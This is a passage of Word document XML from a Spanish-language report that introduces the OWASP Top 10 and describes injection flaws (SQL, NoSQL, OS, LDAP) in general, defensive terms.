                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Los ataques pueden, potencialmente, utilizar diferentes rutas a través de su aplicación para perjudicar su negocio u organización</w:t>
            </w:r>
            <w:r w:rsidR="00912EEA" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. Cada uno de estos caminos representa un riesgo que puede o no ser suficiente grave como para merecer atención. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Algunas veces, estos caminos son fáciles de encontrar y explorar, mientras que otras son extremadamente difíciles. De la misma manera, el perjuicio ocasionado puede no tener consecuencias, o puede dejarlo en la quiebra. A fin de determinar el riesgo para las organizaciones, poder evaluar la probabilidad asociada a cada agente de amenaza, vectores de ataque, debilidad de seguridad y combinarlo con una estimación del impacto técnico y de negocio para las organizaciones el OWASP (The Open Web Application Security Project) el cual por medio de su Top 10 aborda los riesgos de seguridad de aplicaciones más impactantes que enfrentan las organizaciones en la actualidad. </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:id w:val="-1168629725"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:b w:val="0"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:instrText xml:space="preserve">CITATION Wic17 \l 2058 </w:instrText>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t>(OWASP, 2017)</w:t>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00DD13F3" w:rsidRPr="00912EEA" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A continuación se muestra una comparativa del top 10 donde se muestran los cambios que se han acelerado durante los 4 años. La cual está basada en la mejora de la metodología, la utilización de nuevos procesos de obtención de datos y por supuesto basándose en los frameworks y lenguajes que eran utilizados hasta el 2017.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DD13F3" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DD13F3" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32AF16FB" wp14:editId="0211618C">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1227398</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>109892</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5511165" cy="2900680"/>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54E253.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId73">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5511165" cy="2900680"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00DD13F3" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RIESGOS EN LA SEGURIDAD DE LAS APLICACIONES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:trPr>
          <w:trHeight w:val="1217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FD7DA79" wp14:editId="46E55104">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64901</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="page">
                    <wp:posOffset>547</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1187450" cy="785495"/>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549BBD.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId74">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1187450" cy="785495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Inyección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Las fallas de inyección, como SQL, NoSQL, OS o LDAP ocurren cuando se envían datos no confiables a un intérprete, como parte de un comando o consulta. Los datos dañinos del atacante pueden engañar al intérprete para que ejecute comandos involuntarios o acceda a los datos sin la debida autorización.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:trPr>
          <w:trHeight w:val="1328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6661D700" wp14:editId="5281FEF4">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-71433</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="page">
                    <wp:posOffset>11364</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8147714" cy="837565"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="635"/>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541184.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill rotWithShape="1">
                          <a:blip r:embed="rId75">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect b="62393"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8149524" cy="83775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167841" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1514"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Casi cualquier fuente de datos puede ser un vector de inyección: variables de entorno, parámetros, servicios web externos e internos, y todo tipo de usuarios. Los defectos de inyección ocurren cuando un atacante puede enviar información dañina a un intérprete.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Estos defectos son muy comunes, particularmente en código heredado. Las vulnerabilidades de inyección se encuentran a menudo en consultas SQL, NoSQL, LDAP, XPath, comandos del SO, analizadores XML, encabezados SMTP, lenguajes de expresión, parámetros y consultas ORM.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los errores de inyección son fáciles de descubrir al examinar el código y los escáneres y fuzzers ayudan a encontrarlos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Una inye</w:t>
            </w:r>
            <w:r w:rsidR="0059624A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">cción puede causar divulgación y </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>denegación de acceso.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0059624A" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059624A" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059624A" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0059624A" w:rsidRDefault="0059624A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BA6B7F" w:rsidRPr="00912EEA" w:rsidRDefault="00BA6B7F" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
